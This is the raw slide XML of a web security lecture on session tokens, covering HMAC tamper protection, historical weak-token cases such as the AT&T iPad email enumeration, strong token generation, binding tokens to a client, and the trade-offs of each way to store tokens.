            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF03CCD4-6D24-B644-90EA-E3BC92C59376}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6458711" y="2792471"/>
            <a:ext cx="5108999" cy="3164509"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Token = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[ user ID, expiration time, access rights, user info … ]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>How to prevent client from tampering with his session token?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>HMAC(server key, token)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Server must still maintain some user state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>For example, logout status (check on every request) to prevent usage of unexpired tokens after logout</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000"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11C6406D-AEB7-BF41-898B-44ED57ACC550}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6806615" y="3690412"/>
              <a:ext cx="4411080" cy="85680"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="Ink 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11C6406D-AEB7-BF41-898B-44ED57ACC550}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="6716975" y="3510412"/>
                <a:ext cx="459072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2D4F777-5E2D-1240-A5DA-3A24ACC92D06}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6818134" y="3947092"/>
              <a:ext cx="1885467" cy="85680"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="Ink 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2D4F777-5E2D-1240-A5DA-3A24ACC92D06}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="6728127" y="3767092"/>
                <a:ext cx="2065121" cy="445320"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="331489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AC1407CF-9D6F-A740-87B6-E046C63644CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="92075" tIns="46038" rIns="92075" bIns="46038" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Examples of Weak Tokens</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17412" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B06B707-2C61-484A-A955-7B8DD1B1E618}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066799" y="2103120"/>
            <a:ext cx="7930309" cy="4278630"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Verizon Wireless: counter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Log in, get current counter, can view sessions of other users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Old Apache Tomcat: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>generateSessionID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>() as MD5(PRNG)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>... but weak pseudo-random number generator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Result: predictable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>SessionID’s</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>ATT’s first-gen iPad site: SIM card ID in the request used to populate a Web form with the user’s email address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>IDs are serial and guessable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Brute-force script harvested 114,000 email addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20486" name="Picture 6" descr="http://upload.wikimedia.org/wikipedia/commons/thumb/9/95/Weevilicious.jpg/220px-Weevilicious.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5BC2CFC-FC25-4742-9001-0704E0921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873" y="4610100"/>
            <a:ext cx="18240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9D06D49-5476-8F42-80B4-2246394A545C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9530509" y="3673476"/>
            <a:ext cx="198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solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>41 months in federal prison</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Down Arrow 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B685CDAD-8476-5540-B15D-AAC3E6426E15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9759110" y="4381500"/>
            <a:ext cx="233363" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 49868"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C00000"/>
          </a:solidFill>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="me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2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0A05E78-2816-864B-8DF0-4C796060A3F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8888954" y="5833724"/>
            <a:ext cx="2661306" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Andrew “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>weev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Auernheimer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="412892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FAAB-211F-9044-ADB3-A30D2452DB1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Generating Strong Session Tokens</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8773EF8-22A8-B841-A66E-3BEC011A539D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066799" y="2103120"/>
            <a:ext cx="7536288" cy="3849624"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Use underlying Web framework – ASP, Rails, Tomcat, etc. – to generate unpredictable (to attacker) tokens</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Example (Rails): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>token = SHA256(current time, random nonce)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27968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18434" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB3B4B2B-FB55-7346-83BC-4C88544E7DB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723619" y="891241"/>
            <a:ext cx="3939084" cy="5075519"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Binding Token to Client’s Machine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="78" name="Straight Connector 77">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435" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#13;&#10;Second level&#13;&#10;Third level&#13;&#10;Fourth level&#13;&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B1C1EDD-741F-4540-B81B-F82E86120B92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5300812" y="891241"/>
            <a:ext cx="5978834" cy="5075519"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Embed machine-specific data in the token</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Client’s IP address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Harder to use token at another machine if stolen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>If honest client changes IP address during session, will be logged out for no reason</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Client’s browser / user agent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>A weak defense against theft, but doesn’t hurt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>HTTPS (TLS) session key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Same problem as IP address  (and even worse)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3092700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A7BE50A4-8C00-814E-86E7-631B50A3173C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Storing Session Tokens</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19459" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#13;&#10;Second level&#13;&#10;Third level&#13;&#10;Fourth level&#13;&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D5715B5-D8D9-D54F-9E01-F5966BEBC83A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Embed in URL links</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>site.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>checkout?SessionToken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>=kh7y3b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Browser cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>Set-Cookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>SessionToken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>=fduhye63sfdb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Store in a hidden form field</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>&lt;input type=“hidden” name=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>sessionid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>” value=“kh7y3b”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Window.name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> DOM property</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D9B54E2-1659-D148-87F1-9F7D43B5F962}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9155016" y="1366160"/>
            <a:ext cx="936475" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Issues</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDFC31FC-19B1-704C-9F8A-20824FF95556}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7535536" y="2051108"/>
            <a:ext cx="3719288" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Token leaks via HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3698544-AB53-734E-BB24-77547735B910}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7094862" y="2737760"/>
            <a:ext cx="4845586" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Browser automatically sends token with every request, even if request not initiated by the user (cross-site request forgery)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F17FF09F-1EBF-4146-BAB8-BE7004DD9117}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7590620" y="3835210"/>
            <a:ext cx="2007281" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Short sessions only</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92112797-00FF-7B4C-B84C-D06202DBEFBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7612655" y="4486190"/>
            <a:ext cx="3664203" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not private, does not work if user connects from another window, short sessions only</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Right Arrow 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A9E4DAC-D2D3-524D-B0A7-E66A662A1C23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6789606" y="2103120"/>
            <a:ext cx="672028" cy="317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C49656D-7FFF-A74D-8FF5-9063308CA130}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6809802" y="3037717"/>
            <a:ext cx="672028" cy="317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D0C31F3-7BDD-5849-AACE-390EF91D0002}"/>
              </a:ext>
